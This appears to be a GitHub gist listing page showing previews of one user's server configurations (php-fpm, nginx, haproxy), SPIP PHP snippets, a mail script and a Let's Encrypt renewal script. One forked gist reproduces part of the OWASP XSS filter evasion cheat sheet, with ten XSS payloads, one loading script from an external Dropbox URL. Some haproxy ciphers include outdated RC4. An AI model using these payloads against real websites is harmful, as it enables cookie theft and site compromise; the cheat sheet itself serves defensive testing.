@tech-nova
tech-nova / seenthis.conf
Created February 24, 2017 11:34
The php5-fpm pool for seenthis
; Start a new pool named 'www'.
; the variable $pool can be used in any directive and will be replaced by the
; pool name ('www' here)
[www_seenthis]
; Per pool prefix
; It only applies on the following directives:
; - 'access.log'
; - 'slowlog'
; - 'listen' (unixsocket)
@tech-nova
tech-nova / seenthis.net.conf
Last active February 24, 2017 11:31
nginx configuration for seenthis
# The other redirects are handled by default.conf
server {
listen 8080;
server_name seenthis.net;
access_log /var/www/seenthis.net/log/access.log combined buffer=512k flush=60m;
error_log /var/www/seenthis.net/log/error.log crit;
root /var/www/seenthis.net/public_html;
@tech-nova
tech-nova / haproxy.cfg
Created February 24, 2017 11:18
haproxy configuration
global
log /dev/log local0
log /dev/log local1 notice
chroot /var/lib/haproxy
stats socket /run/haproxy/admin.sock mode 660 level admin
stats timeout 30s
user haproxy
group haproxy
daemon
@tech-nova
tech-nova / haproxy.cfg
Created June 12, 2016 09:05 — forked from rnewson/haproxy.cfg
haproxy.cfg stanzas to enable Perfect Forward Secrecy and HTTP Strict Transport Security. Requires OpenSSL 1.0.1g or so.
# Bind SSL port with PFS-enabling cipher suite
bind :443 ssl crt path_to_certificate no-tls-tickets ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-RSA-RC4-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES128-SHA:AES256-SHA256:AES256-SHA:RC4-SHA
# Distinguish between secure and insecure requests
acl secure dst_port eq 443
# Mark all cookies as secure if sent over SSL
rsprep ^Set-Cookie:\ (.*) Set-Cookie:\ \1;\ Secure if secure
# Add the HSTS header with a 1 year max-age
@tech-nova
tech-nova / balise_dynamique_perso.php
Created April 9, 2016 10:04
Create a custom dynamic tag
<?php
function balise_GESTION_TRUC ($p) {
return calculer_balise_dynamique($p, 'GESTION_TRUC', array());
}
function balise_GESTION_TRUC_dyn() {
// Do things in PHP
// Directly return a result to display
@tech-nova
tech-nova / mail_form_utf8_content.php
Last active March 10, 2016 08:46
To send a mail in UTF-8 (hand-crafted code)
<?php
// Code used to send a UTF-8 message
// In two formats (HTML + text)
// Without any accent problems
// The data injected into the mail comes from a page encoded in UTF-8
// via <meta charset>
$message_txt = sprintf(utf8_encode("Vous avez reçu un message depuis le formulaire de contact :
@tech-nova
tech-nova / statistiques sur les clics
Last active February 19, 2016 10:40
Statistics for the last 6 months
<?php
if (!defined("_ECRIRE_INC_VERSION")) return; // secure
include_spip("base/clics");
function action_stats() {
include_spip("inc/filtres");
$lastmonth = mktime(0, 0, 0, date("m")-6, date("d"), date("Y"));
if (!_request('min') OR !_request('max')) {
$url1 = parametre_url(self(),'min',sinon(_request('min'),date('Y-m-d',$lastmonth)));
@tech-nova
tech-nova / xss-owasp-cheatsheet
Created February 14, 2016 21:38 — forked from sseffa/xss-owasp-cheatsheet
xss-owasp-cheatsheet
#
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
# based on the RSnake original http://ha.ckers.org/xss.html
# Retrieved on 2013-11-20
# Much of this is wildly obsolete
#
# XSS Locator 2
'';!--"<XSS>=&{()}
1) <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
4) <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
5) <img/src=`%00` onerror=this.onerror=confirm(1)
6) <form><isindex formaction="javascript&colon;confirm(1)"
7) <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
8) <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
@tech-nova
tech-nova / le-renew.sh
Created January 14, 2016 12:02
Script to renew the Letsencrypt certificate when it has fewer than 30 days of validity left
#!/bin/bash
# With /etc/cron.d/check-letsencrypt to renew the Letsencrypt certificate
# 30 1 * * 1 root /usr/local/sbin/le-renew-webroot >> /var/log/le-renewal.log
# nginx configuration: centminmod
web_service='nginx'
domain='epoxit.com'
config_file="/home/nginx/domains/$domain/private/letsencrypt/le-renew-webroot.ini"